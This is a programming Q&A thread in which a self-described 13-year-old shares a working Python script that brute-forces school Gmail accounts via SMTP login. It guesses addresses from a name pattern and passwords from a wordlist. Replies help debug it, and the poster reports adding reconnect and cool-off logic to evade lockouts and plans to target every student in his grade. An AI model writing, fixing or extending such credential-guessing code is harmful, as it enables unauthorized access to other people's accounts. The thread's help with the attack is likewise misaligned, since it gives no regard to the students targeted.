# Python SMTP not logging in

Tags: python, email, smtp, cracking

Before we get started, I have to say that I'm very new to Python. It would make sense if I did something stupidly wrong, but I think I would have figured that out by now. I'm 13, and this is my first language. I've followed Python Basics Youtube tutorials, but still am missing a ton of experience and techniques.

Anyways, back to the point. I'm currently writing a script that should, in theory, crack school email accounts. They're all formatted in the same general way: FIRST.LAST.GRAD@mySchool.org. I don't really have a reason for this, it just seems exciting. Here's my code:

```
FIRSTNAME = input("Target's first name: ")
LASTNAME = input("Target's last name: ")

try:
    GRADYEAR = int(input("Target's graduation year: "))
except ValueError:
    print("\nPlease enter a number.")
    exit()

username = str(FIRSTNAME.lower()) + '.' + str(LASTNAME.lower()) + '.' + str(GRADYEAR) + '@mySchool.org'
username = username.strip()
print('''
Email: %s
''' % username)
passwfile = input("Enter the password file name: ")
if passwfile == "":
    passwfile = "180-185.lst" # My default file
passwfile = open(passwfile, "r")

    
import smtplib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

    
    
ExitLoop = False

for password in passwfile:
    password = "{}{}".format(str(password.strip()),LASTNAME.lower())
    try:
        try:
            smtpserver.login(username,password)
            response = "\n[+] Password Found %s" % password
            break;
            
        except UnicodeEncodeError:
            response = 'UNICODE ERROR\n'
            
    except smtplib.SMTPAuthenticationError:
        response = "[!] Password Incorrect or App Security Issue: %s" % password
        
    except smtplib.SMTPServerDisconnected:
        response = "\nUh oh! The server disconnected you!"
        ExitLoop = True
    
    finally:
        print(response.strip())
        if ExitLoop == True:
            break;

input("\nPRESS ENTER TO CONTINUE")
```

TL;DR: Basically asks for target's information and formats it accordingly. Then for every potential password in my separate list, it attempts a login with that information (brute force).

I am aware of Google's relatively new security features, which prevent this method for a brute force unless you specifically [allow less secure apps to access your account](https://www.google.com/settings/security/lesssecureapps/). This won't be a problem, because I don't actually need to use it on anyone (if I did I would just use a keylogger). Please understand that I am not asking for a solution to, "Why does it have a long gibberish error full of Google crap?". For whatever reason, when I try this on myself it doesn't work. I really don't understand what I'm doing wrong.

Main questions:
When I run this script on myself, let's say I enter this information:

```
Target's first name: "John"
Target's last name: "Smith"
Target's graduation year: 2016 [ignore the fact that I'm not a senior]

Email: john.smith.2016@mySchool.edu

Enter the password file name: ""

*Starts for loop...*

[!] Password Incorrect or App Security Issue: 000000smith
```

But that's my password! It just skips over the correct line and continues attempting others in the list. I don't understand what I did wrong...can someone figure out what's wrong with my script?

I have another question, after a while of constant attempts, Google disconnects me from their SMTP server. Is there a work-around? Would connecting inside my for loop each time individually help? On the contrary, I'm sure it would cause immense lag.

BTW I'm aware of all the extra code in my program, I haven't cleaned it up yet.

Comment: Why do you append `LASTNAME.lower()` to the password from the file, instead of just using the password from the file?

Comment: @Gerrat The format for passwords at out school is PASSWORDlastname. If my student number was 000000 then my password would be 000000weber. Sorry, I forgot to clarify that.

Answer (score 0, accepted):

I tweaked your example, used it myself, and successfully logged into a (different) email server.  The only conclusion I can come to is that you're not logging in with the correct credentials (or possibly you've been locked out with too many incorrect password attempts)

Try the following steps in order (proceeding only if that step was successful):

1. Verify you can log in with those credentials, without using a program.
2. Write a simpler program, where you hard-code both the username and password in, and see if it can log in.  (Don't get any user input, or read anyfiles - just a straightforward login to the server)
3. Just before the `smtpserver.login(username,password)` line, insert the following two lines:

   `print([(c, ord(c)) for c in username])
   print([(c, ord(c)) for c in password])`

Verify both the characters you're passing and the ordinal value (in case the character just `looks` like the correct character in your username or password.

When you're faced with a bug, always try simplifying until you get to the smallest, simplest example that shows your issue.  Usually you'll find your issue during this process.

Comment: I hardcoded it, and it seems to be successful. I then gradually went up from hardcode to variable input. It seems to be working fine. Thanks. I added a main class to avoid global variables (because I think I might add a dictionary of every student in my grade), and added a reconnect and cooloff function, so the server doesn't lock me out. Thanks again, Adler.